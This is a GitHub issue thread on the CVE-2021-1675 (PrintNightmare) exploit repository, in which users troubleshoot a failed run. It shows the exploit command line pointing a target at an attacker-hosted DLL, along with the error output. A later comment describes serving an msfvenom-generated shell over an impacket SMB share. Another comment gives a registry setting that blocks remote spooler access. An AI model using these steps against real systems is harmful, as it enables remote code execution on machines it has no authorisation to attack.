CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

Published 20 hours ago verified publisher icon cube0x0

Failed to enumerate remote pDriverPath

Open oflavioc opened this issue 3 years ago • 5 comments

Facing the error below:

┌──(kali㉿kali)-[~/CVE-2021-1675] └─$ python3 CVE-2021-1675.py server.local/user:[email protected] '\192.168.10.215\print.dll' 1 ⨯ [*] Connecting to ncacn_np:192.168.10.116[\PIPE\spoolss] [+] Bind OK [-] Failed to enumerate remote pDriverPath RPRN SessionError: unknown error code: 0x8001011b

Does that mean the server is not vulnerable?

oflavioc avatar Oct 02 '21 04:10 oflavioc

Encountering exactly the same issue (testing from Kali to W10 client). Any thoughts? P.S. remote access to print spooler can be blocked easily by setting REG_DWORD RegisterSpoolerRemoteRpcEndpoint to 2 under hive HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers

bitbull06 avatar Dec 02 '21 10:12 bitbull06

I was able to solved this problem by moving the shell generated by msfvenom to /home/kali/Desktop.

Then i configure the smbserver with the directory, as seen below

impacket-smbserver share /home/kali/Desktop -smb2support

I hope this work for you too

cyber-Techy avatar May 15 '23 20:05 cyber-Techy